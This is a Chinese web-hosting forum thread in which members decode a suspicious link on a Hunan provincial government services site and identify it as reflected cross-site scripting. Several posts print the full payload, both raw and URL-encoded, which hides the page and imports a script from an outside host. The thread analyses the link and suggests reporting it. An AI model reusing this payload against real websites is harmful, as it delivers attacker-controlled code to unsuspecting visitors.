立即注册  找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 75|回复: 6

这是漏洞被利用了么

[复制链接]

这是漏洞被利用了么

[复制链接]

11

主题

7

回帖

119

积分

注册会员

积分
119
magotcai

11

主题

7

回帖

119

积分

注册会员

积分
119
2024-4-11 11:42:57 | 显示全部楼层 |阅读模式
看不出怎么操作的。
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11%252522%25257D%25253B%252524%252528%252560*%252560%252529.hide%252528%252529%25253Bimport%252528%252527%25252F%25252Fwx4.cc%25252Fhunan%252527%252529%25253B%25257B%252522&areanamesearch=%2525u6E56%2525u5357%2525u7701&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair

回复

使用道具 举报

71

主题

134

回帖

1327

积分

金牌会员

积分
1327
a692830

71

主题

134

回帖

1327

积分

金牌会员

积分
1327
2024-4-11 11:47:11 | 显示全部楼层
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11"};$(`*`).hide();import('//wx4.cc/hunan');{"&areanamesearch=湖南省&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair
回复

使用道具 举报

11

主题

7

回帖

119

积分

注册会员

积分
119
magotcai 楼主

11

主题

7

回帖

119

积分

注册会员

积分
119
2024-4-11 11:48:15 | 显示全部楼层

a692830 发表于 2024-4-11 11:47

https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hun ...

这样看就是这网站js有漏洞呀

回复

使用道具 举报

71

主题

134

回帖

1327

积分

金牌会员

积分
1327
a692830

71

主题

134

回帖

1327

积分

金牌会员

积分
1327
2024-4-11 11:47:00 | 显示全部楼层
没有多大用啊 微信 QQ均已经拦截
回复

使用道具 举报

31

主题

48

回帖

583

积分

高级会员

积分
583
sakuraidc

31

主题

48

回帖

583

积分

高级会员

积分
583
2024-4-11 11:49:38 | 显示全部楼层
"

反馈一下,说不定有钱拿
回复

使用道具 举报

78

主题

919

回帖

2510

积分

金牌会员

积分
2510
个人支付宝接口

78

主题

919

回帖

2510

积分

金牌会员

积分
2510
2024-4-11 11:49:52 | 显示全部楼层
多次urldecode后可以看到URL传递的参数如下:

/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11"};$(`*`).hide();import('//wx4.cc/hunan');{"&areanamesearch=%u6E56%u5357%u7701&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair

通过wordsearch参数传入的JS代码调用了//wx4.cc/hunan这个JS


回复

使用道具 举报

8

主题

101

回帖

656

积分

高级会员

积分
656
func

8

主题

101

回帖

656

积分

高级会员

积分
656
2024-4-11 11:48:00 | 显示全部楼层
xss漏洞
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|HS2V主机综合交流论坛

GMT+8, 2024-12-23 10:33 , Processed in 0.020855 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表